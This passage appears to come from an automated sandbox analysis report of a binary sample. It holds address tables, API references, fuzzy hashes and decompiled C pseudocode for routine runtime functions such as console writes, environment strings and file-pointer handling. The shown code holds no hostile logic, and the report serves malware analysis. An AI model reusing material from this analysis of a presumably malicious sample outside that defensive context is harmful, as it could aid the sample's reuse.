                                                      0x0042ecac
                                                      0x0042ecb5
                                                      0x0042ecbb
                                                      0x0042ecbe
                                                      0x0042ecc5
                                                      0x0042eccc
                                                      0x0042eccf
                                                      0x0042ee10
                                                      0x0042ee33
                                                      0x0042ee3f
                                                      0x0042ee70
                                                      0x0042ee73
                                                      0x0042ee75
                                                      0x00000000
                                                      0x0042ee41
                                                      0x0042ee41
                                                      0x0042ee44
                                                      0x0042ee4a
                                                      0x0042ef94
                                                      0x0042efa2
                                                      0x0042efab
                                                      0x0042ee50
                                                      0x0042ee5a
                                                      0x0042ee5f
                                                      0x0042ee65
                                                      0x0042ee6b
                                                      0x00000000
                                                      0x0042ee6b
                                                      0x0042ee65
                                                      0x0042ee4a
                                                      0x0042ee12
                                                      0x0042ee19
                                                      0x0042ee1c
                                                      0x0042ee1f
                                                      0x0042ee21
                                                      0x0042ee24
                                                      0x0042ee2b
                                                      0x0042ee2d
                                                      0x0042ee76
                                                      0x0042ee79
                                                      0x0042ee7a
                                                      0x0042ee7f
                                                      0x0042ee85
                                                      0x0042ee8b
                                                      0x00000000
                                                      0x0042ee8b
                                                      0x0042ee85
                                                      0x0042ecd5
                                                      0x0042ecd8
                                                      0x0042ecda
                                                      0x0042ecdc
                                                      0x0042ece0
                                                      0x0042ece1
                                                      0x0042ece5
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0042ece5
                                                      0x0042ecea
                                                      0x0042ecec
                                                      0x0042ecf1
                                                      0x0042edb1
                                                      0x0042edb8
                                                      0x0042edb9
                                                      0x0042edbe
                                                      0x0042ef70
                                                      0x00000000
                                                      0x0042ef72
                                                      0x0042ef72
                                                      0x0042ef75
                                                      0x0042ef84
                                                      0x0042ef88
                                                      0x0042ef89
                                                      0x00000000
                                                      0x0042ef8d
                                                      0x00000000
                                                      0x0042edc4
                                                      0x0042edc9
                                                      0x0042edcf
                                                      0x0042edd5
                                                      0x0042edde
                                                      0x0042ede9
                                                      0x0042edee
                                                      0x0042edf4
                                                      0x0042edfd
                                                      0x0042ee00
                                                      0x00000000
                                                      0x0042ee00
                                                      0x0042edf4
                                                      0x0042ecf7
                                                      0x0042ecfa
                                                      0x0042ed00
                                                      0x0042ed02
                                                      0x0042ed0f
                                                      0x0042ed10
                                                      0x0042ed13
                                                      0x0042ed16
                                                      0x0042ed1b
                                                      0x0042ef41
                                                      0x0042ef43
                                                      0x0042ef46
                                                      0x0042ef49
                                                      0x0042ef55
                                                      0x0042ef58
                                                      0x0042ef5a
                                                      0x0042ef5b
                                                      0x0042ef5f
                                                      0x0042ef62
                                                      0x0042ef66
                                                      0x0042ef66
                                                      0x0042ef66
                                                      0x0042ef69
                                                      0x0042ef69
                                                      0x0042ed21
                                                      0x0042ed21
                                                      0x0042ed24
                                                      0x0042ed26
                                                      0x0042ed29
                                                      0x0042ed2b
                                                      0x0042ed2f
                                                      0x0042ed30
                                                      0x0042ed31
                                                      0x0042ed35
                                                      0x0042ed3a
                                                      0x0042ed44
                                                      0x0042ed49
                                                      0x0042ed4c
                                                      0x0042ed4c
                                                      0x0042ed4f
                                                      0x0042ed52
                                                      0x0042ed54
                                                      0x0042ed57
                                                      0x0042ed60
                                                      0x0042ed64
                                                      0x0042ed65
                                                      0x0042ed6c
                                                      0x0042ed72
                                                      0x0042ed7a
                                                      0x0042ed85
                                                      0x0042ed8a
                                                      0x0042ed95
                                                      0x0042ed9a
                                                      0x0042eda0
                                                      0x0042eda9
                                                      0x0042ee03
                                                      0x0042ee03
                                                      0x0042ee8e
                                                      0x0042ee93
                                                      0x0042eea5
                                                      0x0042eeaa
                                                      0x0042eead
                                                      0x0042eeb2
                                                      0x0042eecd
                                                      0x0042efb0
                                                      0x0042efb6
                                                      0x0042eed3
                                                      0x0042eed3
                                                      0x0042eede
                                                      0x0042eee0
                                                      0x0042eee3
                                                      0x0042eeec
                                                      0x0042eef6
                                                      0x00000000
                                                      0x0042eef8
                                                      0x0042eefa
                                                      0x0042eefc
                                                      0x0042ef15
                                                      0x00000000
                                                      0x0042ef1b
                                                      0x0042ef1f
                                                      0x0042ef25
                                                      0x0042ef28
                                                      0x0042ef2e
                                                      0x0042ef31
                                                      0x00000000
                                                      0x0042ef31
                                                      0x0042ef1f
                                                      0x0042ef15
                                                      0x0042eef6
                                                      0x0042eeec
                                                      0x0042eecd
                                                      0x0042eeb2
                                                      0x0042eda0
                                                      0x0042ed1b
                                                      0x0042ecf1
                                                      0x00000000
                                                      0x0042ef34
                                                      0x0042ef34
                                                      0x0042ef3d
                                                      0x0042efb8
                                                      0x0042efbd
                                                      0x0042efd3
                                                      0x00000000

                                                      APIs
                                                      • GetConsoleOutputCP.KERNEL32(1989D38F,00000000,00000000,?), ref: 0042EC6A
                                                        • Part of subcall function 00425640: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,004300C8,?,00000000,-00000008), ref: 004256EC
                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0042EEC5
                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0042EF0D
                                                      • GetLastError.KERNEL32 ref: 0042EFB0
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                      • String ID:
                                                      • API String ID: 2112829910-0
                                                      • Opcode ID: bc9fdc8139a34b3df14fa1ccb1fae876d5832b9b142f50cf7b5edcbe76968acc
                                                      • Instruction ID: a53dea836ef26b7dc2d758a7b1ba395d833ebbccaff088d82c73695fd233fc07
                                                      • Opcode Fuzzy Hash: bc9fdc8139a34b3df14fa1ccb1fae876d5832b9b142f50cf7b5edcbe76968acc
                                                      • Instruction Fuzzy Hash: A4D19BB5E00258AFCF15CFA9E980AEDBBB4FF49304F59412AE815E7351D734A802CB54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00423BCD Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00423BCD(intOrPtr* _a4, intOrPtr _a8, void* _a12, intOrPtr _a16) {
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr _t20;
				intOrPtr _t30;
				char _t32;
				intOrPtr _t40;
				intOrPtr* _t42;
				intOrPtr _t43;

				_t42 = _a4;
				if(_t42 != 0) {
					_t32 = 0;
					__eflags =  *_t42;
					if( *_t42 != 0) {
						_t17 = E00425640(_a16, 0, _t42, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t17;
						if(_t17 != 0) {
							_t40 = _a8;
							__eflags = _t17 -  *((intOrPtr*)(_t40 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t18 = E00424631(_a16, _t42,  *((intOrPtr*)(_t40 + 8)),  *((intOrPtr*)(_t40 + 0xc)));
								__eflags = _t18;
								if(_t18 != 0) {
									 *((intOrPtr*)(_t40 + 0x10)) = _t18 - 1;
									_t20 = 0;
									__eflags = 0;
								} else {
									E00420DE2(GetLastError());
									_t20 =  *((intOrPtr*)(E00420E3C()));
								}
								L14:
								return _t20;
							}
							_t20 = E004246EC(_t40, __eflags, _t17);
							__eflags = _t20;
							if(_t20 != 0) {
								goto L14;
							}
							goto L11;
						}
						E00420DE2(GetLastError());
						return  *((intOrPtr*)(E00420E3C()));
					}
					_t43 = _a8;
					__eflags =  *((intOrPtr*)(_t43 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t43 + 8)))) = _t32;
						L2:
						 *((intOrPtr*)(_t43 + 0x10)) = _t32;
						return 0;
					}
					_t30 = E004246EC(_t43, __eflags, 1);
					__eflags = _t30;
					if(_t30 != 0) {
						return _t30;
					}
					goto L6;
				}
				_t43 = _a8;
				E004246D2(_t43);
				_t32 = 0;
				 *((intOrPtr*)(_t43 + 8)) = 0;
				 *((intOrPtr*)(_t43 + 0xc)) = 0;
				goto L2;
			}











                                                      0x00423bd4
                                                      0x00423bd9
                                                      0x00423bf7
                                                      0x00423bf9
                                                      0x00423bfc
                                                      0x00423c25
                                                      0x00423c2d
                                                      0x00423c2f
                                                      0x00423c48
                                                      0x00423c4b
                                                      0x00423c4e
                                                      0x00423c5c
                                                      0x00423c69
                                                      0x00423c6e
                                                      0x00423c70
                                                      0x00423c89
                                                      0x00423c8c
                                                      0x00423c8c
                                                      0x00423c72
                                                      0x00423c79
                                                      0x00423c84
                                                      0x00423c84
                                                      0x00423c8e
                                                      0x00000000
                                                      0x00423c8e
                                                      0x00423c53
                                                      0x00423c58
                                                      0x00423c5a
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00423c5a
                                                      0x00423c38
                                                      0x00000000
                                                      0x00423c43
                                                      0x00423bfe
                                                      0x00423c01
                                                      0x00423c04
                                                      0x00423c13
                                                      0x00423c16
                                                      0x00423bed
                                                      0x00423bed
                                                      0x00000000
                                                      0x00423bf0
                                                      0x00423c0a
                                                      0x00423c0f
                                                      0x00423c11
                                                      0x00423c92
                                                      0x00423c92
                                                      0x00000000
                                                      0x00423c11
                                                      0x00423bdb
                                                      0x00423be0
                                                      0x00423be5
                                                      0x00423be7
                                                      0x00423bea
                                                      0x00000000

                                                      APIs
                                                        • Part of subcall function 00425640: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,004300C8,?,00000000,-00000008), ref: 004256EC
                                                      • GetLastError.KERNEL32 ref: 00423C31
                                                      • __dosmaperr.LIBCMT ref: 00423C38
                                                      • GetLastError.KERNEL32(?,?,?,?), ref: 00423C72
                                                      • __dosmaperr.LIBCMT ref: 00423C79
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                      • String ID:
                                                      • API String ID: 1913693674-0
                                                      • Opcode ID: bb10eb9b72b20aa5542df0a65871fdb8fdff27c606f177166854fd43258794c1
                                                      • Instruction ID: b8151eb99f8a68d4d06da345af7c731b8b7f7996250bcd268df4f3d7025656a4
                                                      • Opcode Fuzzy Hash: bb10eb9b72b20aa5542df0a65871fdb8fdff27c606f177166854fd43258794c1
                                                      • Instruction Fuzzy Hash: 82210672300224AFDB11AF67A88196BB7B9EF00369780852FF919A7201D73CEE408758
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0042575E Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 17%
                                                      			E0042575E() {
				intOrPtr _v8;
				signed int _v12;
				WCHAR* _t5;
				void* _t6;
				intOrPtr _t9;
				WCHAR* _t19;
				WCHAR* _t26;
				WCHAR* _t29;

				_push(_t21);
				_t5 = GetEnvironmentStringsW();
				_t29 = _t5;
				if(_t29 != 0) {
					_t6 = E00425727(_t29);
					_t19 = 0;
					_v12 = _t6 - _t29 >> 1;
					_t9 = E00425640(0, 0, _t29, _t6 - _t29 >> 1, 0, 0, 0, 0);
					_v8 = _t9;
					if(_t9 != 0) {
						_t26 = E00410766(_t9);
						_push(0);
						if(_t26 != 0) {
							_push(0);
							_push(_v8);
							_push(_t26);
							_push(_v12);
							_push(_t29);
							_push(0);
							_push(0);
							if(E00425640() != 0) {
								E0041072C(0);
								_t19 = _t26;
							} else {
								E0041072C(_t26);
							}
							FreeEnvironmentStringsW(_t29);
							_t5 = _t19;
						} else {
							E0041072C();
							FreeEnvironmentStringsW(_t29);
							_t5 = 0;
						}
					} else {
						FreeEnvironmentStringsW(_t29);
						_t5 = 0;
					}
				}
				return _t5;
			}











                                                      0x00425764
                                                      0x00425766
                                                      0x0042576c
                                                      0x00425770
                                                      0x00425778
                                                      0x0042577d
                                                      0x0042578b
                                                      0x0042578e
                                                      0x00425796
                                                      0x0042579b
                                                      0x004257af
                                                      0x004257b2
                                                      0x004257b5
                                                      0x004257c8
                                                      0x004257c9
                                                      0x004257cc
                                                      0x004257cd
                                                      0x004257d0
                                                      0x004257d1
                                                      0x004257d2
                                                      0x004257dd
                                                      0x004257e8
                                                      0x004257ed
                                                      0x004257df
                                                      0x004257e0
                                                      0x004257e0
                                                      0x004257f1
                                                      0x004257f7
                                                      0x004257b7
                                                      0x004257b7
                                                      0x004257be
                                                      0x004257c4
                                                      0x004257c4
                                                      0x0042579d
                                                      0x0042579e
                                                      0x004257a4
                                                      0x004257a4
                                                      0x004257fa
                                                      0x004257fd

                                                      APIs
                                                      • GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,0040D5F4,00000000,0040D59B,0040DC00,00402C1D,00000007,00448100,00000014), ref: 00425766
                                                        • Part of subcall function 00425640: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,004300C8,?,00000000,-00000008), ref: 004256EC
                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042579E
                                                      • FreeEnvironmentStringsW.KERNEL32(00000000,00000000), ref: 004257BE
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                      • String ID:
                                                      • API String ID: 158306478-0
                                                      • Opcode ID: 96b5b286bd2cd6b5465ddd9c0beee91674836441f3643db3f319723c8509d538
                                                      • Instruction ID: 3ced00c3bd1707d87fae662702780b670483d36c60a580fa5b5d9955351aced3
                                                      • Opcode Fuzzy Hash: 96b5b286bd2cd6b5465ddd9c0beee91674836441f3643db3f319723c8509d538
                                                      • Instruction Fuzzy Hash: B91108B5600A25BF662127B27CC9CBF7A9CDED53A8B90002AF905D1101EE7C9D418979
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041F6DF Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 83%
                                                      			E0041F6DF(union _LARGE_INTEGER* __edx, void* _a4, union _LARGE_INTEGER _a8, intOrPtr _a12, signed int _a16) {
				long _v8;
				void* _v12;
				union _LARGE_INTEGER* _v16;
				void* _v20;
				int _t21;
				signed int _t23;
				void* _t25;
				union _LARGE_INTEGER* _t30;

				_t30 = __edx;
				_push(1);
				if(SetFilePointerEx(_a4, 0, 0,  &_v20) == 0) {
					L1:
					_t23 = E00420E05(GetLastError(), _a16);
					L7:
					return _t23 | 0xffffffff;
				}
				_push(_a12);
				asm("cdq");
				_v12 = 0;
				_v8 = 0;
				_t21 = SetFilePointerEx(_a4, _a8, _t30,  &_v12);
				__eflags = _t21;
				if(_t21 == 0) {
					goto L1;
				}
				_t25 = _v12;
				__eflags = _v8;
				if(__eflags >= 0) {
					if(__eflags > 0) {
						L6:
						_push(0);
						SetFilePointerEx(_a4, _v20, _v16, 0);
						_t23 = _a16;
						 *((char*)(_t23 + 0x1c)) = 1;
						 *((intOrPtr*)(_t23 + 0x18)) = 0x16;
						goto L7;
					}
					__eflags = _t25 - 0x7fffffff;
					if(_t25 > 0x7fffffff) {
						goto L6;
					}
				}
				return _t25;
			}











                                                      0x0041f6df
                                                      0x0041f6eb
                                                      0x0041f6fd
                                                      0x0041f6ff
                                                      0x0041f709
                                                      0x0041f762
                                                      0x00000000
                                                      0x0041f762
                                                      0x0041f712
                                                      0x0041f71c
                                                      0x0041f722
                                                      0x0041f725
                                                      0x0041f728
                                                      0x0041f72e
                                                      0x0041f730
                                                      0x00000000
                                                      0x00000000
                                                      0x0041f732
                                                      0x0041f735
                                                      0x0041f738
                                                      0x0041f73a
                                                      0x0041f743
                                                      0x0041f743
                                                      0x0041f74e
                                                      0x0041f754
                                                      0x0041f757
                                                      0x0041f75b
                                                      0x00000000
                                                      0x0041f75b
                                                      0x0041f73c
                                                      0x0041f741
                                                      0x00000000
                                                      0x00000000
                                                      0x0041f741
                                                      0x0041f767

                                                      APIs
                                                      • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?), ref: 0041F6F5
                                                      • GetLastError.KERNEL32(?,?,?,?), ref: 0041F702
                                                      • SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 0041F728
                                                      • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 0041F74E
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: FilePointer$ErrorLast
                                                      • String ID:
                                                      • API String ID: 142388799-0
                                                      • Opcode ID: 52e809cd4da653044e7007faf5613bcc96453228249a88dc93cbea3a222c1dba
                                                      • Instruction ID: 074deca5fc4da70c0739a6c067004c18d98ba94a74d51735b9c292895e8e7602
                                                      • Opcode Fuzzy Hash: 52e809cd4da653044e7007faf5613bcc96453228249a88dc93cbea3a222c1dba
                                                      • Instruction Fuzzy Hash: 8D118B75800119BBEF10AF55DC48DDF3F79EF41364F104126F824A22A0DB35CA96EBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004016A8 Relevance: 6.0, APIs: 4, Instructions: 48stringCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 90%
                                                      			E004016A8(struct HDC__* __ecx, RECT* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				struct HDC__* _v8;
				struct tagSIZE _v16;
				int _t20;
				RECT* _t28;
				RECT* _t29;
				struct HDC__* _t30;
				int _t32;

				_t28 = __edx;
				_t30 = __ecx;
				_t29 = __edx;
				_v8 = __ecx;
				GetTextExtentPoint32W(_t30, _a12, lstrlenW(_a12),  &_v16);
				if(_a4 != 0) {
					if(_a8 == 0) {
						_t32 = _t29->bottom - _v16.cy;
					} else {
						_t32 = _t29->top;
					}
					_t20 = lstrlenW(_a12);
					asm("cdq");
					ExtTextOutW(_v8, _t29->right - _v16.cx + _t29->left - _t28 >> 1, _t32, 4, _t29, _a12, _t20, 0);
				}
				return 1;
			}










                                                      0x004016a8
                                                      0x004016b3
                                                      0x004016b9
                                                      0x004016bb
                                                      0x004016c9
                                                      0x004016d3
                                                      0x004016d9
                                                      0x004016e3
                                                      0x004016db
                                                      0x004016db
                                                      0x004016db
                                                      0x004016eb
                                                      0x004016fe
                                                      0x0040170a
                                                      0x0040170a
                                                      0x00401718

                                                      APIs
                                                      • lstrlenW.KERNEL32(?,?), ref: 004016BE
                                                      • GetTextExtentPoint32W.GDI32(?,?,00000000), ref: 004016C9
                                                      • lstrlenW.KERNEL32(?,00000000,?,?,00000000), ref: 004016EB
                                                      • ExtTextOutW.GDI32(?,00000000,00000000,00000004,?,?,00000000), ref: 0040170A
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: Textlstrlen$ExtentPoint32
                                                      • String ID:
                                                      • API String ID: 2058588642-0
                                                      • Opcode ID: 3d996921ec8ddad02bc61899835b92fc23c5fda3bf2369814e5500e1504ad06a
                                                      • Instruction ID: 933a20e25848bcfded38d5de8f98efbe81582bbe70bb3c9b9f4c1c686360419c
                                                      • Opcode Fuzzy Hash: 3d996921ec8ddad02bc61899835b92fc23c5fda3bf2369814e5500e1504ad06a
                                                      • Instruction Fuzzy Hash: E8015A76400209FFDB019FA8DC08AAEBB79FF05310F048565FE14A32A0D731AE60DB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0043AEE6 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 20%
                                                      			E0043AEE6(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t25;
				void* _t27;
				void* _t28;
				intOrPtr _t30;
				intOrPtr* _t32;
				void* _t34;

				_t29 = __edx;
				_t27 = __ebx;
				_t36 = _a28;
				_t30 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t30);
					_push(_a4);
					E0043B55F(__edx, _t36);
					_t34 = _t34 + 0x10;
				}
				_t37 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t30);
				}
				E0043C010(_t28);
				_t32 = _a32;
				_push( *_t32);
				_push(_a20);
				_push(_a16);
				_push(_t30);
				E0043BAAF(_t27, _t28, _t29, _t30, _t37);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t30);
				_push(_a4);
				_t25 = E0043ACF0(_t29, _t32, _t37);
				if(_t25 != 0) {
					E0043BFDE(_t25, _t30);
					return _t25;
				}
				return _t25;
			}












                                                      0x0043aee6
                                                      0x0043aee6
                                                      0x0043aee9
                                                      0x0043aeee
                                                      0x0043aef1
                                                      0x0043aef3
                                                      0x0043aef6
                                                      0x0043aef9
                                                      0x0043aefa
                                                      0x0043aefd
                                                      0x0043af02
                                                      0x0043af02
                                                      0x0043af05
                                                      0x0043af09
                                                      0x0043af0c
                                                      0x0043af11
                                                      0x0043af0e
                                                      0x0043af0e
                                                      0x0043af0e
                                                      0x0043af14
                                                      0x0043af1a
                                                      0x0043af1d
                                                      0x0043af1f
                                                      0x0043af22
                                                      0x0043af25
                                                      0x0043af26
                                                      0x0043af2f
                                                      0x0043af34
                                                      0x0043af37
                                                      0x0043af3d
                                                      0x0043af40
                                                      0x0043af43
                                                      0x0043af46
                                                      0x0043af47
                                                      0x0043af4a
                                                      0x0043af55
                                                      0x0043af59
                                                      0x00000000
                                                      0x0043af59
                                                      0x0043af60

                                                      APIs
                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 0043AEFD
                                                        • Part of subcall function 0043B55F: ___AdjustPointer.LIBCMT ref: 0043B5A9
                                                      • _UnwindNestedFrames.LIBCMT ref: 0043AF14
                                                      • ___FrameUnwindToState.LIBVCRUNTIME ref: 0043AF26
                                                      • CallCatchBlock.LIBVCRUNTIME ref: 0043AF4A
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                      • String ID:
                                                      • API String ID: 2633735394-0
                                                      • Opcode ID: d4d6c6883e045b1e6aa67314bb92174f826cf948eab81e74ea15b9ee94e6514d
                                                      • Instruction ID: d6b1605ec65050092f45d437c3f307fcd60a65a88c72e76c94c7974318da79c8
                                                      • Opcode Fuzzy Hash: d4d6c6883e045b1e6aa67314bb92174f826cf948eab81e74ea15b9ee94e6514d
                                                      • Instruction Fuzzy Hash: 6B012D72040108BBCF126F55CC05EDA3B7AEF4C758F05501AFA5865121D33AE871DFA9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004377C8 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E004377C8(void** _a4) {
				void* _t12;
				void** _t13;

				_t13 = _a4;
				_t12 = WriteConsoleW( *0x44b8a0,  *_t13, _t13[1], _t13[2], 0);
				if(_t12 == 0 && GetLastError() == 6) {
					E00437897();
					E00437859();
					_t12 = WriteConsoleW( *0x44b8a0,  *_t13, _t13[1], _t13[2], _t12);
				}
				return _t12;
			}





                                                      0x004377ce
                                                      0x004377e8
                                                      0x004377ec
                                                      0x004377f9
                                                      0x004377fe
                                                      0x00437818
                                                      0x00437818
                                                      0x0043781f

                                                      APIs
                                                      • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 004377E2
                                                      • GetLastError.KERNEL32 ref: 004377EE
                                                        • Part of subcall function 00437897: CloseHandle.KERNEL32(FFFFFFFE,004378E1,?,00435F45,00000000,00000001,00000000,?,?,0042F004,?,00000000,00000000,?,?), ref: 004378A7
                                                      • ___initconout.LIBCMT ref: 004377FE
                                                        • Part of subcall function 00437859: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00437888,00435F32,?,?,0042F004,?,00000000,00000000,?), ref: 0043786C
                                                      • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 00437812
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                      • String ID:
                                                      • API String ID: 2744216297-0
                                                      • Opcode ID: ef79f6263f78a00cccc44c12194632657b6be6619743b254bb85983983f243c3
                                                      • Instruction ID: 19305179e44a827041f8cb4bfb66a98057992b61532bbb65dd5a90b2a557160b
                                                      • Opcode Fuzzy Hash: ef79f6263f78a00cccc44c12194632657b6be6619743b254bb85983983f243c3
                                                      • Instruction Fuzzy Hash: 3CF0FE3E100504ABCB323F96DC089467FA6EFCE765F104839F69982530DA329860DB59
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004378AE Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E004378AE(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x44b8a0, _a4, _a8, _a12, 0);
